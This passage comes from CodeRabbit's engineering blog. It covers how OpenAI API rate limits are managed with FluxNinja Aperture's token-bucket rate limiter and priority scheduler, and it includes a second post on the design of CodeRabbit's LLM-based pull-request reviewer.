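For contrast with a global token bucket, the makeshift per-instance approach described earlier (a concurrency cap plus retries with growing back-off) can be sketched roughly as follows. This is an illustrative Python sketch, not CodeRabbit's client code: `RateLimitError`, `make_limiter`, `backoff_delays`, `call_with_retries`, and all default values are hypothetical names and numbers chosen for the example.

```python
import random
import threading
import time


class RateLimitError(Exception):
    """Hypothetical stand-in for an HTTP 429 response from the upstream API."""


def make_limiter(max_in_flight):
    """Cap the number of in-flight requests for one reviewer instance."""
    return threading.BoundedSemaphore(max_in_flight)


def backoff_delays(base=1.0, factor=2.0, cap=60.0, max_retries=5):
    """Un-jittered delay in seconds before each retry, growing exponentially up to cap."""
    return [min(cap, base * factor ** attempt) for attempt in range(max_retries)]


def call_with_retries(send, limiter, delays, sleep=time.sleep, jitter=random.random):
    """Call send() under the concurrency cap, retrying on RateLimitError.

    The slot is released before sleeping, so a request that is backing off
    does not block other requests on the same instance.
    """
    for delay in delays:
        with limiter:
            try:
                return send()
            except RateLimitError:
                pass
        # Sleep a random fraction of the scheduled delay to spread out retries.
        sleep(delay * jitter())
    # Final attempt: any error now propagates to the caller.
    with limiter:
        return send()
```

Every value here (cap size, base delay, retry count) has to be guessed per instance, and no instance knows what the others are sending, which is the limitation the text describes.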
### Implementing the Aperture TypeScript SDK in our reviewer service

Our reviewer service runs on Google Cloud Run, while the Aperture Agents are deployed on a separate Kubernetes cluster (GKE). To integrate with the Aperture Agents, we employ Aperture's TypeScript SDK. Before calling OpenAI, we rely on Aperture Agent to gate the request using the `StartFlow` method. To provide more context to Aperture, we also attach the following labels to each request:

* `model_variant`: This specifies the model variant being used (`gpt-4`, `gpt-3.5-turbo`, or `gpt-3.5-turbo-16k`). Requests and tokens per minute rate limit policies are set individually for each model variant.
* `api_key`: This is a cryptographic hash of the OpenAI API key, and rate limits are enforced on a per-key basis.
* `estimated_tokens`: As the tokens per minute quota limit is enforced based on the [estimated tokens for the completion request](https://platform.openai.com/docs/guides/rate-limits/reduce-the-max_tokens-to-match-the-size-of-your-completions), we need to provide this number for each request to Aperture for metering. Following OpenAI's [guidance](https://help.openai.com/en/articles/4936856-what-are-tokens-and-how-to-count-them), we calculate `estimated_tokens` as `(character_count / 4) + max_tokens`. Note that OpenAI's rate limiter doesn't tokenize the request using the model's specific tokenizer but relies on a character count-based heuristic.
* `product_tier`: CodeRabbit offers both `pro` and `free` tiers. The `pro` tier provides comprehensive code reviews, whereas the `free` tier offers only the summary of the pull request.
* `product_reason`: We also label why a review was initiated under the `pro` tier. For example, the reason could be that the user is a `paid_user`, a `trial_user` or an `open_source_user`. Requests to OpenAI are prioritized based on these labels.
* `priority`: Requests are ranked according to a priority number provided in this label. For instance, requests from `paid_user` are given precedence over those from `trial_user` and `open_source_user`. The base priority is incremented for each file reviewed, enabling pull requests that are further along in the review process to complete more quickly than newly submitted ones. Additionally, chat messages are assigned a much higher priority compared to review tasks.

![](https://framerusercontent.com/images/aCvZzngJXymwfYDVcMKq2XDKlM.png)

Integration with Aperture TypeScript SDK

### Policy configuration in Aperture: Aligning with OpenAI's rate limits

Aperture offers a foundational "blueprint" for [managing quotas](https://docs.fluxninja.com/reference/blueprints/quota-scheduling/base), comprising two main components:

* **Rate limiter:** OpenAI employs a token bucket algorithm to impose rate limits, and that is directly compatible with Aperture's rate limiter. For example, in the tokens per minute policy for `gpt-4`, we have allocated a burst capacity of `40000 tokens`, and a refill rate of `40000 tokens per minute`. The bucket begins to refill the moment the tokens are withdrawn, aligning with OpenAI's rate-limiting mechanism. This ensures our outbound request and token rate remains synchronized with OpenAI's enforced limits.
* **Scheduler:** Aperture has a [weighted fair queuing](https://docs.fluxninja.com/concepts/scheduler/) scheduler that prioritizes the requests based on multiple factors such as the number of tokens, priority levels and workload labels.

By fine-tuning these two components in Aperture, we can go as fast as we can, with optimal user experience, while ensuring that we don't exceed the rate limits.
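To make the two components concrete, here is a small Python sketch of the idea: a token bucket sized like the `gpt-4` tokens-per-minute policy above, fed by the `(character_count / 4) + max_tokens` estimate, with a priority queue in front of it. It does not use Aperture or its SDK. The class and function names are hypothetical, the estimate rounds down (an assumption), and the queue is strict-priority with FIFO tie-breaking, which is a deliberate simplification of weighted fair queuing.

```python
import heapq
import itertools


def estimate_tokens(prompt, max_tokens):
    """Character-count heuristic from the text: (character_count / 4) + max_tokens."""
    return len(prompt) // 4 + max_tokens


class TokenBucket:
    """Token bucket with a burst capacity and a steady refill rate."""

    def __init__(self, capacity, refill_per_minute, now=0.0):
        self.capacity = capacity
        self.refill_per_second = refill_per_minute / 60.0
        self.tokens = capacity
        self.updated_at = now

    def try_take(self, amount, now):
        """Refill for the elapsed time, then withdraw amount if it is available."""
        elapsed = now - self.updated_at
        self.tokens = min(self.capacity, self.tokens + elapsed * self.refill_per_second)
        self.updated_at = now
        if amount <= self.tokens:
            self.tokens -= amount
            return True
        return False


class PriorityScheduler:
    """Strict-priority queue in front of a bucket (a simplification of WFQ)."""

    def __init__(self, bucket):
        self.bucket = bucket
        self._heap = []
        self._order = itertools.count()  # FIFO tie-break among equal priorities

    def submit(self, name, priority, tokens):
        # heapq is a min-heap, so negate the priority to pop the highest first.
        heapq.heappush(self._heap, (-priority, next(self._order), name, tokens))

    def admit(self, now):
        """Admit queued requests, highest priority first, until the head no longer fits."""
        admitted = []
        while self._heap:
            _, _, name, tokens = self._heap[0]
            if not self.bucket.try_take(tokens, now):
                break
            heapq.heappop(self._heap)
            admitted.append(name)
        return admitted
```

With a bucket of `TokenBucket(40000, 40000)`, a chat message and a paid review submitted alongside a large trial review are admitted first, and the trial review waits until the bucket has refilled enough to cover it.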
Client-side quota management policies for gpt-4

## Reaping the benefits

During peak hours, we typically process tens of pull requests, hundreds of files, and chat messages concurrently. The image below shows the incoming token rate and the accepted token rate for the `gpt-4` tokens-per-minute policy. We can observe that the incoming token rate is spiky, while the accepted token rate remains smooth and hovers around `666 tokens per second`. This roughly translates to `40,000 tokens per minute`. Essentially, Aperture is smoothing out the fluctuating incoming token rate to align it with OpenAI's rate limits.

![](https://framerusercontent.com/images/tVKawcfxMtGtulPpNuuHSUVxVM.png)

The image below shows request prioritization metrics from the Aperture Cloud console during the same peak load period:

![](https://framerusercontent.com/images/VXO8ccw5QJvUSCeam41bZRISrQ.png)

In the upper left panel of the metrics, noticeable peaks indicate that some requests got queued for several minutes in Aperture. We can verify that the trial and free-tier users tend to experience longer queue times compared to their paid counterparts and chat requests.

Queue wait times can fluctuate based on the volume of simultaneous requests in each workload. For example, wait times are significantly longer during peak hours as compared to off-peak hours. Aperture provides scheduler preemption metrics to offer further insight into the efficacy of prioritization. As observed in the lower panels, these metrics measure the relative impact of prioritization for each workload by showing how many tokens a request gets preempted or delayed in the queue relative to a purely First-In, First-Out (FIFO) ordering.

In addition to effectively managing the OpenAI quotas, Aperture provides insights into OpenAI API performance and errors. The graphs below show the overall response times for various OpenAI models we use.
We observe that the `gpt-4` family of models is significantly slower compared to the `gpt-3.5-turbo` family of models. This is quite insightful, as it hints at why OpenAI's infrastructure struggles to meet demand - these APIs are not just simple database or analytics queries; they are computationally expensive to run. ![](https://framerusercontent.com/images/Te7MPRH8HaivWTczZWpZ6YBlqrM.png) ## Conclusion[](https://blog.coderabbit.ai/blog/coderabbit-openai-rate-limits#conclusion) Aperture has been a game-changer for CodeRabbit. It has enabled us to continue signing up users and growing our usage without worrying about OpenAI rate limits. Without Aperture, our business would have hit a wall and resorted to a wait-list approach, which would have undermined our traction. Moreover, Aperture has provided us with valuable insights into OpenAI API performance and errors, helping us monitor and improve the overall user experience. In the realm of generative AI, we are dealing with a fundamentally different nature of API dynamics. Performance wise, these APIs are an order of magnitude slower than traditional APIs. We believe that request scheduling and prioritization will become a critical component of the AI infrastructure stack, and with Aperture, FluxNinja is well positioned to be the leader in this space. As CodeRabbit continues to build and add additional components such as vector databases, which are also computationally expensive, we are confident that Aperture will continue to help us offer a reliable experience to our users.

AI and the Future of Code Reviews - A Deep Dive into CodeRabbit

Aravind Putrevu — Tue, 22 Aug 2023 00:00:00 GMT

We are witnessing an inflection point in the software development industry. Developers around the world have been realizing the incredible possibilities that AI can bring. The introduction of [GitHub Copilot](https://github.com/features/copilot) and [ChatGPT](https://chat.openai.com/auth/login) has revolutionized software development. They have been the [fastest-growing tools](https://aibusiness.com/companies/one-year-on-github-copilot-adoption-soars) in the history of software development.

While many tools have emerged on the code generation side, the code review process has remained largely unchanged. We continue to use the same tools and processes that were used 10 years ago. The code is still manually reviewed, which is slow, error-prone, and expensive.

To address this, we are building [CodeRabbit](https://coderabbit.ai/), an AI-powered code reviewer that is part of the code merge and CI/CD process. With CodeRabbit, our vision is to speed up the code merge process by an order of magnitude, while also improving the quality of the code beyond what is possible with human reviewers and existing linting tools alone.

## Impediments to shipping quality software @Speed

An average developer spends most of their time between writing and reviewing the code. Typically, the development process involves branching off from the main code base, developing a new feature or fixing a bug, and then merging the code back into the mainline.

To write software, developers use modern editors such as Visual Studio Code which include sophisticated language servers, static analyzers and linters. These tools are being rapidly augmented by AI-powered extensions such as GitHub Copilot. Local development tools are just one part of the equation.
Relying on local tools alone is not sufficient to prevent quality issues, as they are inconsistent across the developers, which makes it difficult to enforce standards. To ensure quality, the code is merged collaboratively in the form of [pull requests (PR)](https://docs.github.com/en/pull-requests) in platforms such as GitHub/GitLab. As soon as the PR is opened, the CI/CD process kicks in. The code is linted, compiled and tested. Most importantly, the code is reviewed by a peer who checks for the intention of changes, in addition to looking for coding standards, security vulnerabilities, and other issues. The reviews require a broader context to not just understand the changes but also evaluate the impact on the larger codebase. The reviewer approves the PR, and the code is merged into the main codebase. The code review is required not just for the quality of the code but also for meeting compliance and regulatory requirements. While the ideal code review process sounds smooth and efficient, the reality is often riddled with challenges and inefficiencies. Specifically, the manual review is often the slowest part of the development process. It is not uncommon for a **PR** to take days or even weeks to get merged. Here's a brief glimpse into the challenges: **Team Slowdown:** The waiting period for code reviews and merges affects not just individual developers but the whole team. Project timelines get stretched, leading to delays in launching new features or fixing critical bugs. **Context Switching:** Developers often lose context when they switch from coding to waiting for a review. Getting back into the code takes time and mental energy, which hampers productivity. **Rubber-Stamp Reviews:** In dysfunctional teams, the code review process can become a mere formality. Reviewers might approve code without thorough inspection, allowing bugs and vulnerabilities to slip through. 
**Personality Clashes:** Sometimes, friction between the developer and the reviewer goes beyond code quality, leading to nitpicking and unnecessary delays. This can create a toxic work environment, affecting the team's morale.

**Job Dissatisfaction:** Continual delays and inefficiencies in the code merge process can often demoralize developers to the point where they consider switching jobs, affecting the company's retention rates.

In summary, the status quo is not ideal, and it is evident from the software bugs, security vulnerabilities, and the service outages that frequently plague the software industry.

## Merging code 10x faster with CodeRabbit

CodeRabbit is an AI-powered code reviewer that significantly speeds up the code review process while also improving the quality of the code. It works seamlessly within the pull request workflow and collaborates with the developer and the reviewer to ensure code quality. It goes beyond existing linters and static code analysis tools in uncovering issues and suggesting improvements by providing a human-like understanding of the objective of the code.

With CodeRabbit, developers get context-aware feedback within minutes, which enables them to make improvements based on best practices and get their code ready to be merged faster. CodeRabbit also helps reviewers by providing them with confidence and speed to approve the code faster. Reviewers can use CodeRabbit's auto-generated walkthrough and suggestions as a starting point for their review. Peer reviewers can have a three-way collaboration with the developer and CodeRabbit, which can significantly enrich the review experience while saving them time and effort.

CodeRabbit is built on top of generative AI to provide the following key capabilities:

**Summarization:** CodeRabbit summarizes the code changes in the PR and provides a high-level overview. This helps the reviewer and product team to quickly understand the changes and the impact on the product.

**Incremental Reviews:** CodeRabbit thoroughly reviews the code after each commit and provides incremental feedback to the developer. It uncovers issues and suggests improvements by commenting on the code like a human reviewer.

**Chat about changes:** CodeRabbit provides conversational capability that allows developers and reviewers to ask questions, generate code, and get feedback in the context of changes.

## Designing CodeRabbit

The review process is multi-stage, as shown in the figure below. CodeRabbit's workflow is triggered when a developer opens a pull request or commits code to an existing pull request. This is followed by various summarization and review stages.

![](https://framerusercontent.com/images/Y83rpWAtskEjGPenr3dNOUm6mY.png)

CodeRabbit is not just a simple wrapper that does pass-through to the LLMs. To circumvent context size limits, CodeRabbit uses an innovative, multi-LLM and multi-stage approach to scale reviews for larger change sets. Unlike AI-based code completion, code review is a much more complex problem. The reviewer context is much broader than the developer context, as the reviewer needs to uncover not just obvious issues but also understand the larger context of the pull request and changes across multiple files. Below is a glimpse into the challenges we faced and the solutions we came up with:

**Context window size:** LLMs have limited context windows; for instance, `gpt-3.5-turbo` has a context window of 4K or 16K tokens and `gpt-4` has a context window of 8K tokens. This is often insufficient to pack larger change sets. To circumvent this, we provide various summaries while reviewing changes to each file and smartly prioritize the context that is packed into each request.
**Inputting and outputting structured content:** LLMs are particularly bad at understanding and generating structured content and mathematical computation. We had to design new input formats, that are closer to how humans understand changes, instead of using the standard unified diff format. We also had to provide few-shot examples to the LLMs to get the desired results. **Noise:** LLMs are terrible at differentiating between noise and signal. For instance, if you ask LLMs for 20 suggestions, you will get them, but only a few of them will be useful. This is particularly true for code reviews. We had to design a multi-stage review process that reinforces the signal and filters out the noise. **Costs:** While advanced models like `gpt-4` are great in performing complex tasks, they are several orders of magnitude more expensive than models like `gpt-3.5-turbo`. We had to design a multimodel approach that uses simpler models for summarizations, while complex models are used for tasks such as reviewing code. In addition, simpler models act as a triage filter that identifies the changes that need to be thoroughly reviewed by more complex models. **Inaccuracies:** LLMs are not perfect and often return inaccurate results, and they sometimes even ignore instructions and completely fabricate a response. Rather than keep fighting the LLMs, we wrote layers of sanity checks to fix or hide the inaccuracies from the user. **Data privacy:** The biggest concern from our users is whether their code is being stored and used to train the models. We made sure that all queries to LLMs are ephemeral, and the data is discarded right away from our service. At the same time, it's challenging to provide stateful incremental reviews without storing the data. We had to design a system that stores all state within the pull request itself and not in our service for maximum privacy. 
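As a rough illustration of the context-window point above, prioritizing what gets packed into a request can be approached as a greedy selection under a token budget. The Python sketch below is only one plausible way to do it and is not CodeRabbit's implementation: `ContextPiece`, `rough_tokens`, `pack_context`, the labels, and the four-characters-per-token estimate are all assumptions made for the example.

```python
from dataclasses import dataclass


@dataclass
class ContextPiece:
    label: str      # illustrative labels, e.g. "file_diff" or "pr_summary"
    text: str
    priority: int   # higher means more important to include


def rough_tokens(text):
    """Rough size estimate: about four characters per token."""
    return max(1, len(text) // 4)


def pack_context(pieces, budget_tokens):
    """Greedily keep the highest-priority pieces that fit in the budget.

    The chosen pieces are returned in their original order so the
    assembled prompt keeps a natural reading order.
    """
    remaining = budget_tokens
    chosen = set()
    ranked = sorted(range(len(pieces)), key=lambda i: -pieces[i].priority)
    for i in ranked:
        cost = rough_tokens(pieces[i].text)
        if cost <= remaining:
            chosen.add(i)
            remaining -= cost
    return [pieces[i] for i in range(len(pieces)) if i in chosen]
```

Given a diff, a pull request summary, and a lower-priority summary of a related file, a tight budget keeps the first two and drops the third, so the least important context is dropped first when the window is small.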
![](https://framerusercontent.com/images/w4qdCaDYNNioaxnETqhwoiTkKQ.png)

## Conclusion

Building on top of LLMs is a new space, and we can draw parallels to how early software such as MS-DOS was built on top of the IBM PC and Intel microprocessors. Even with limited memory, [killer applications](https://www.pcmag.com/news/the-ibm-pcs-killer-apps-where-are-they-now) were built. The context size limits of LLMs are similar to the memory limits of early PCs. Innovation is required to build sophisticated applications on top of LLMs that give the impression of a much larger context, just like early [3D games](https://en.wikipedia.org/wiki/Doom_(1993_video_game)) used innovative techniques to run even on modest PCs.

It's quite likely that immense value will be captured by the applications while underlying LLMs and AI infrastructure such as vector databases will continue to get commoditized. In addition, the line between the actual model training and the prompting continues to be blurred. Prompts with few-shot examples and fine-tuning can make a big difference in the quality of results, and they are an area that will differentiate products that build on top of LLMs.

At CodeRabbit, we are at the forefront of this innovation by building an AI-first developer tools company from the ground up. We are approaching this problem from first principles, as the techniques being used bear little resemblance to the existing tools like linters and static code analysis tools. We are witnessing an inflection point as AI has crossed the practicality threshold, despite its limitations. Furthermore, we believe that we can keep innovating around the limitations and bring sophisticated products that push the boundaries of what is possible with AI. We are excited about our roadmap and hope to unlock immense value for our customers in the near future.